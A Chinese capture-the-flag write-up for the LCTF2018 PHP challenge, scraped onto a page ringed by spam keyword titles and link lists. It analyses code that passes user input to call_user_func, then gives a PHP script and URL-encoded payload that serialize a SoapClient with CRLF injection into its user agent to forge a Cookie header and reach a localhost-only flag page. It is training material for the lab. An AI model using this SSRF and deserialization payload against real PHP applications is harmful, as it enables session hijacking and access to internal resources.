当前位置: 首页 > news >正文

白城市住房建设局网站页面模板图片大小

白城市住房建设局网站,页面模板图片大小,wordpress 主题 轮播,房产cms进入靶场 分析代码 <?php // 此函数用于高亮显示当前文件&#xff08;即包含此代码的 PHP 文件&#xff09;的源代码&#xff0c;常用于调试或展示代码结构。 highlight_file(__FILE__);// 定义一个变量 $b&#xff0c;其值为字符串 implode&#xff0c;implode 是 PHP 中…

进入靶场

分析代码

<?php
// 此函数用于高亮显示当前文件(即包含此代码的 PHP 文件)的源代码,常用于调试或展示代码结构。
highlight_file(__FILE__);// 定义一个变量 $b,其值为字符串 'implode',implode 是 PHP 中的一个内置函数,用于将数组元素组合成一个字符串。
$b = 'implode';// 通过 call_user_func 函数调用由用户通过 GET 请求传入的参数 'f' 所指定的函数,并将 POST 请求的数据作为参数传递给该函数。
call_user_func($_GET['f'], $_POST);// 启动一个新的会话或者继续当前的会话,用于在多个页面之间存储和共享用户数据。
session_start();// 检查是否通过 GET 请求传入了名为 'name' 的参数。
if (isset($_GET['name'])) {// 如果存在 'name' 参数,则将其值存储到会话变量 $_SESSION['name'] 中。$_SESSION['name'] = $_GET['name'];
}// 打印出当前会话变量的详细信息,用于调试目的,显示会话中存储的所有数据。
var_dump($_SESSION);// 创建一个数组 $a,该数组包含两个元素:第一个元素是会话变量 $_SESSION 中的第一个值(通过 reset 函数获取),第二个元素是字符串 'welcome_to_the_lctf2018'。
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');// 调用之前定义的变量 $b 所代表的函数(即 implode 函数),将数组 $a 的元素组合成一个字符串。
// 不过这里没有对 implode 函数的返回值进行任何处理,组合后的字符串没有被使用。
call_user_func($b, $a);
?>

这行代码执行后输出了 array(0) { }。这是 var_dump 函数对 $_SESSION 变量进行输出的结果 

注意:当使用 session_start() 开启会话并设置会话变量后,PHP 会在会话结束时自动将会话数据序列化并存储到指定的会话存储位置 ,在本段代码中,意味着name需要进行反序列化操作 

还 得知我们通过get方式传递函数名给f

通过post方式传递给函数f的参数

通过get方式传递的还有参数name

既然用到了post就先抓包

随意提交内容后,发现最后只有名字提交的参数会显示在页面上,而虽然在源代码里允许我们闯入函数名和参数,但是它不会在页面上显示。反应过来源代码里面没有输出。 

想获得更多的信息,显然查看源代码和抓包是没有用的,所以我们试着扫描一下目录。看看有没有哪些可以访问到的文件,我用bp

 only localhost can get flag!session_start(); echo 'only localhost can get flag!'; $flag = 'LCTF{*************************}'; if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){ $_SESSION['flag'] = $flag; } only localhost can get flag!

本地代码肯定是要提交的,所以我们在 name 的参数里面提交,刚好进行反序列化

那就用 PHP 脚本实现

<?php$target ='http://127.0.0.1/flag.php';$b = new SoapClient(null,array('location'=>$target,'user_agent' => "npfs\r\nCookie:PHPSESSID=123456\r\n",// r n 也就是空行回车'uri' => "http://127.0.0.1/"));$se = serialize($b);echo "|" . urlencode($se);?>

 

|O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A17%3A%22http%3A%2F%2F127.0.0.1%2F%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A31%3A%22npfs%0D%0ACookie%3APHPSESSID%3D123456%0D%0A%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

 

 

 

 

 

 

http://www.dtcms.com/a/489692.html

相关文章:

  • 戴尔官方网站建设启示上海网站建设乐云seo模板中心
  • 网站发帖功能怎么做网站开发语言识别
  • 青海高端网站建设多少钱aso优化排名推广
  • 两学一做考试网站农业企业网站模板
  • 网站开发商品管理表字段网址导航网站简单制作
  • 宿州市埇桥区建设局网站租车网站模版
  • 安顺网站开发公司徐州信息网最新消息
  • 网站网页怎么压缩广州自助公司建网站企业
  • 求个没封的w站2021不用下载wordpress出现百度抓取404页面
  • 网站3网合一是怎么做的化妆品网站建设策划方案
  • 教育系统网站cms怎么联系创意设计网站
  • 秦皇岛建网站商标注册查询网官网查询
  • 什么做网站做个多少钱啊专做定制的网站
  • 济南网站推广徽hyhyk1wordpress页面设置全屏
  • dz可以做旅游网站吗怎么推广自己的链接
  • 网上三维展馆网站是怎么做的中天建设集团有限公司营业执照
  • 电气毕业设计代做网站上线了小程序官网登录
  • 银川网站建设公司电话合肥肥东网站建设
  • 网站一片空白五站合一网站建设
  • 东莞公司建设网站制作抖音小程序推广计划怎么开通
  • 一等一网站建设郑州网络工程学院
  • 网站登陆界面psdjsp手机版网站开发
  • 太仓建设银行网站赶集网网站建设ppt模板
  • 电子商务网站建设实例做网站的设计文档怎么做
  • 住房和创新建设部网站如何注册一个自己的品牌
  • 江苏网站开发公司免备案免费域名
  • 新乡商城网站建设布吉做网站
  • 网站开发手把手外链博客网站
  • 安徽省建设干部学校网站建网页用什么软件
  • 代理网站推荐今天最火的新闻头条